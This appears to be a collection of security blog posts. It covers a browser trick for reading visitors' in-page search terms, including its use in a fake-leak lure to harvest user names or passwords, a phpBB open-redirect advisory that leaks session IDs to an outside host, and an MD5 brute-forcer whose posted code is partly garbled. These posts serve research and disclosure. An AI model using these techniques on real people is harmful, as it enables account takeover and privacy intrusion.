## I know what you’re searching for…

Didn’t you always want to know what your visitors are searching? And I don’t mean searching like what he typed into google, but what term(s) they try to find on your website (e.g. using Ctrl-F).

The idea is pretty straightforward: If you are searching something on a site, your browser will highlight what you are searching for (at least the first hit). So it has to somehow fiddle with the representation of the page. The shadow DOM seems to be presenting itself as a target for this one. For those who have never heard of this I recommend Glazkov (2011). In short it is a way to create and modify elements hidden in the DOM; frequently used by browsers to draw complex items like media player controls. After some reading, trying to find out what the API might be, I stumbled upon document.getSelection(). I didn’t really thought this would work, but in fact it does. Well, at least in Firefox. In Chrome the user has close the search widget to make the searched term available. And in Opera it doesn’t work at all. So what do I mean by “it works”?

Firefox highlights the search result on the page and handles it as a selection. This enables the site to have a look at what you are typing in your search field. But this raises one drawback. The getSelection method only works if the searched term can really be found within the document.

To solve this, a pretty straight forward approach sprung to my mind. I could just generate dynamic content providing all possible next inputs. So I basically generate a base set of printable characters and wait for the user to start his search. Then, as he is typing, I continuously check what the user has typed and append a list of strings to the document using the user’s term and postfix it with every printable character. As long as this happens faster than he is typing and he types consecutively, not changing letters within the search term or at the beginning, it works. Such problems could be tackled by generating more letters in advance and also add them within the words. But the general users behaviour should be covered.

A very simple proof of concept can be found here.

You might wonder by now why this is interesting at all. We have stored all our data at social communities and google knows everything we search for anyhow. This brings me to how I initially got the idea to have a look at this. Once again I saw a tweet about a hacked site, that I am registered at and the leaked accounts were presented at some random pastebin page. So I went there and did what? Of course, I searched for my email address, user name or whatever information might indicate that my account information got leaked and is now accessible for everyone else.

In this scenario, all they can find out is that I am the owner of that account I searched for. No harm done, except some privacy issues if combined with some more snooping. But what if an attacker generates user IDs on the fly based on what the lured user types? Thereby gaining new information about the victim’s user name at site XY or his registered email address, depending what information is presented to him in the fake leak.

This could be taken even one step further. The site could only present numerical user ids and corresponding passwords. Done as a targeted attack this could reveal the user’s password granted that he is careless enough to type his password into a search field of his browser. But the inhibition threshold is probably much lower, because you type it into your own browser not a search function of some site or a search engine.

For those of you who really had a look at the demo, probably two questions/remarks arise.
First question is probably: Why are there 5 divs holding old selection predictions? That is caused by two factors. On the one hand more than one div is needed, because once the found search term gets replaced via JavaScript the selection will be an empty string. On the other hand fast typing will cause fast replacement of the divs and make them error prone, especially when deleting. Still there are some cases in which the script loses track, but the enhancements mentioned above should cure some.

Second remark would be that the generated text is not very carefully hidden. Well, first I thought about leaving it completely default text and therefore easier comprehensible what is going on. But then again I wanted to make it at least somewhat less obvious. Sure with CSS or IFrames or whatever is up your sleeves you can hide it completely from the potential victim.

By the way this also works with Pentadactyl in Firefox and Vimium in Chromium, when searching by “/”. This makes Chromium users using Vimium more susceptible to such an attack.

## Client Certificate HTTP Proxy

Hi there. Long time no see.

I just wanted to share my latest tiny project with you. It’s an HTTP proxy, which authenticates the user with the given client certificate (in PEM format) to whatever webserver he’s talking. I needed this for a pentest I’m currently doing and thought I might just as well share it with all of you ;)
You can find it here at github.

If you give it a shot and notice some kind of problem or have a feature request, please file a bug or contact me otherwise.
Thanks and have fun with it.

## PromiFinder

I just started reading “Chained Exploits” recently and stumbled upon a quickly chipped in reference to PromiScan. This tool does something pretty interesting, which I’ve never heard of or read before.

In short it utilizes ARP request with the faked broadcast MAC address of ff:ff:ff:ff:ff:fe to discover network interfaces that are in promiscuous mode. That is possible, because as it turns out the network interface hardware correctly sorts out those requests. Whereas, if the interface is in promiscuous mode, the hardware forwards everything and the software (e.g. kernel driver) evaluates only a part of the MAC address until it concludes it is a broadcast address. I’ve read their paper,which I recommend to everyone interested in this topic and thought why not develop such a tool on myself for linux (as theirs is for windows).

Toying with this lead me to a little drawback of the approach. On linux WLAN seems to be implemented by using the interface as if in promiscuous mode. That leads to the result showing all WLAN interfaces of linux (I only tested with ubuntu) computers as promiscuous interfaces.

So for everyone who wants to know what exactly I did here is the source code. It currently checks for all your network interfaces and scans all subnets for promiscuous devices. In order to use this you need the python packages netifaces and scapy. To run the tool simply execute the following command as root or sudo it.
scapy -c promiFinder.py

## FileSharing via Browser: BrowserShare

I finally managed to get this project far enough to publish a first alpha version.
The idea is to utilize browsers to do filesharing. Well I didn’t develope this idea in the first place, but I picked it up at ha.ckers.org.

The architecture is rather similar to the one from bittorrent. I initially wanted to implement the bittorrent protocol, but I couldn’t find a plain, comprehensive description of the bittorrent protocol. After developing it, I guess it would have been next to impossible to implement a protocol that is suited for a pure p2p based environment.
So like in bittorrent BrowserShare has a server, like a tracker, that only stores where to reach the client and the hash of the file he desires and/or is willing to share.
Then there are clients, they are the ones where the data originates from or ends at. Like .torrent files in bittorrent the client needs .bash files to be able to share it with others or get it from others.
Last but not least there are the browser instances that help to share the content. They get a list of users from the tracker and search for parts one has and others not. After having found a match the browser downloads the part from the client who shares it and sends it to all users needing it. Thereby sharing his bandwith with those who probably don’t have so much bandwidth.
This makes it very easy for someone who wants to help the community sharing files, but doesn’t want to install some kind of software. All he has to do is to point his browser to a special URL and he is a bandwidth sharer.

I’ve made a very short and plain presentation for our open study group CInsects, which describes the protocol and the used features a bit. You can find the slides here.

The next steps in this project are developing a GUI, making it possible to create .bash files from directories and prohibiting malicious usage of the browsers. The third point is the most difficult, because in the current setup the browser includes JavaScript from the clients, which can be arbitrary. A solution to this problem can be a crossdomain XMLHttpRequest, but this feature isn’t yet implemented in most stable branches of the commonly used browsers, as far as I know.
But nevertheless one could just test if this feature is available and choose this safer way to transmit information, leaving the current implementation as a fallback.
The current JavaScript could also be improved regarding this problem. The browser page the JavaScript code relies on could be refreshed after a given timeout to have a new, clean instance of the JavaScript. I’m not too well informed about browser caching, but it should be possible to get the browser to save all pages that transported data to him, so it won’t need to fetch it again from the clients.
Also the search algorithm to find matches in who needs parts and who serves them is currently very simple. It only searches for the first match and then just takes it. A more sophisticated solution would be to find the shareable part with the most needing users, combined with some random picking. The random picking is needed, because of two reasons.
The first is that, if there are several browsers sharing bandwidth and all are relying on the same algorithm to find the part they want to share next, they will all download the same part from probably the same client and then provide them to the other clients. Thereby they waste a huge amount of bandwidth by doing the same thing in parallel.
The second is, if there are constantly new clients joining, desiring the same file, and there are only very few nodes that just need one last part of another file, that is shareable, they would possibly never get their last part.

You can check it out via svn at https://hack0r.net/browserShare with username and password both anonymous. I don’t know if it will work on windows machines, it’s only been tested on linux. I tried to not introduce platform dependent code, but I didn’t test it, so I don’t know. The usage is descibed in the README. You should probably update your version frequently, as there is a pretty long todo list and I hope to go about them soon.

## phpBB Vulnerability: Login redirect SessionID leakage

Yesterday I informed the phpBB devolpers of a flaw I found, but they neglected this issue and told me that such vulnerabilites are unavoidable. Further they told me, that the session id on its own does not provide access, because there are some other parameters that get checked, like the User-Agent header and something they described as a “very similar IP”. I didn’t look into the implementation, so I don’t know what he meant, but this seems like some interesting implementation.

But lets not get too much into the detail before you know what this is all about. That is what I send to the phpBB security tracker:

I. Problem Description

It is possible for an attacker to gain the SessionID from a victim. The
attacker has to bring the victim to visit a link like
This will reset the hidden redirect input field on the resulting page to
“http://mydoma.in/saveSID”. If the victim now logs in he will be
redirected to this URL appended with the sid as GET parameter, which
looks like this on the attackers server:

GET /saveSID?sid=2d26f6b2f4fc7cf39d3d742e7ca4795e HTTP/1.1
Host: mydoma.in
[…]

II. Impact

The leaked SessionID can be used to continue other users sessions and
therefore gaining control over their account.

III. Solution

I would recommend to not allow redirects to foreign domains at all, as
it does not seem to make sense to me.

Lets get back to their objections. The first check, against the User-Agent header really does not provide any security at all, as the attacker only has to copy it from the request he received from the victim.

The second is much more tricky as is comparatively easy to forge an IP, but pretty hard to receive the response to such a request. Well, at least to my knowledge. As far as i could see they use nonces as a session riding prevention, so you need to have the nonce to do state-changing requests.

But nevertheless, I think the sid parameter should be tried as good as possible not to be leaked outside the domain. Maybe someone else knows how to exploit this or somewhen someone will find a way to do so.

## MD5 Brute-Forcer

I just build a short md5 brute force script in python and want to share it, maybe there is someone else out there who might find this one interesting. It is based upon john, more precisely the incremental mode. This is because the stdout flag of john does not work in the default mode, for whatever reason. If someone knows, please tell me.
I wrote it because, today I had a lecture, wherein the lecturer challenged us to reverse a given md5. The usual databases did not lead to a hit, neither did some dictionary based attacks. So I decided to have john try it, but somehow I did not get him to recognize it as an md5. Weirdly md5sum calculated md5s wrong for me, therefore I decided to create a short python script.

import os
import sys
import md5

if len(sys.argv) == 2:
d = sys.argv[1]
o = os.popen('john -stdout -incremental')
for l in o:
if md5.new(l.strip()).hexdigest() == d:
print l.strip()
else:
print 'usage is: ' + sys.argv[0] + ' <md5 hash>'


P.S.: If someone knows why md5sum created wrong output, please enlighten me. The shell command looked like echo "word" | md5sum .

Update (April 23rd 2008):
Today I have been told why the md5sum shell command did not work. It is, because echo ends every output with a new line. You have to use echo -n to stop this behaviour.

Update (May 6th 2008):
Yesterday I enhanced the script a little, so now it takes the hashes from a file and is also capable to brute force several hashes at the same time, which is the main cause for this enhancement. The hashes in the file can be separeted by all kind of whitespace characters recognized by split().

import os
import sys
import md5
import re

if len(sys.argv) == 2:
d = {}
for h in f:
if not (len(h)==32 and re.search('^[0-9a-f]{32}\$', h)):
print 'Invalid hash has been removed:', h
f.remove(h)
else:
d.update( { h : None } )

o = os.popen('john -stdout -incremental')
for l in o:
for h in d:
if md5.new(l.strip()).hexdigest() == h:
d[h] = l.strip()
print 'Hash:', h, 'Clear:', l.strip()
c = False
for h in d:
if not d[h]:
c = True
break
if not c:
for h in d:
print h, '= "' + d[h] + '"'
sys.exit(0)

else:
print 'usage is: ' + sys.argv[0] + ' '


## Bakkalaureatsarbeit

On monday I finished my Bakkalaureatsarbeit. Its somewhat like a bachelor. So I only have to take some more exams, that I even though need for my diploma and then I am allowed to put a BSc in front of my name \begin{proudness} · · · \end{proudness}.

It deals with the subject of making web application vulnerability scanners more effective. We started developing a web application scanner nearly a year ago as a project from the university, on which this elaboration bases. There are some pretty new approaches build in the scanner that are, as far as I know, completely new in web application scanning software developed so far. I am working on this project with Daniel Kreischer, with whom I also wrote the Bakkalaureatsarbeit, and Martin Johns, who supervised the project and paper and gave us many hints, ideas and inspirations.

The scanner itself is not yet ready for release, since it is still under heavy construction to implement all the described features and ideas, but it is supposed to be in the near future. We already tried to hold a talk at the 24C3 last year about this project in an earlier state, but were rejected (at least in the last round as we heard).

If you are interested in this topic or just curious, here is the link to the paper “Bakkalaureatsarbeit: Similarity Examinations of Webpages and Complexity Reduction in Web Application Scanners”. Well it spans over 60 pages so its a little bit more than a usual paper, but if you are already familiar with the web itself and web application security you can certainly skip the first part.

If you are having ideas, concerns or any kind of suggestion, please share it with us.

## Implementation Vulnerabilities and Detection Paper

I totally forgot to put this one online. It is already half a year old and was the result of a seminar that took place in the winter term 2006/2007.

It discusses both web-application vulnerabilities, like XSS, CSRF, SQL injection and the like, and classical ones, like buffer overflows, format strings and dangling pointer references. Each Vulnerability gets first explained and afterwards we describe protection mechanisms and possible problems about them.

There is only one major drawback, that is, the paper is in German, so you are possibly not able to read. But take this as your chance to learn it. ;)

## CIPHER 3 (aka germany – country of hackers)

It has been a while since I made my last posting, but i hope i can add some content again in the near future.

On thursday, 12.07.2007, the CIPHER 3 took place and we as the CInsects participated in it. For those under you, who doesn’t know what this is finds here a little summary what a CTF is. I had more or less voluntarily agreed to set up our infrastructure, but, as it is in live, hadn’t as much time as I thought I would have. So partly therefore and partly because we always seem to start a little confused we started pretty slow and ranged in the last few places. But as the end got closer we slowly made it more towards the top. In the finish spurt we wrote some obviously pretty good advisories, which brought us to the lead in the advisory section and aggrandised us to the 4th position in the end. We were really excited about this result, since nobody bargained for such a good place after our mulled start.

The results and some statistics will be available next week on the CIPHER 3 homepage. Very interesting is the fact, that the first 6 teams are from Germany. So Germany seems to be getting the country of hackers … erm … I mean security experts ;). Well, possibly it this is only, because it is organized and held by a german team. Here is the final scoreboard. If you are interested in which team is from where and representing whom just compare the numbers with those on the CIPHER 3 homepage.

I want to thank here again Lexi and his crew for making such a cool event possible, taking all the time it needs to prepare it and keeping calm if the players complain when something doesn’t work the way wanted. Naturally I would thank all the other participants too. It was a great game and I hope everyone enjoyed it as much as we did. :)

Update: Stats are available here.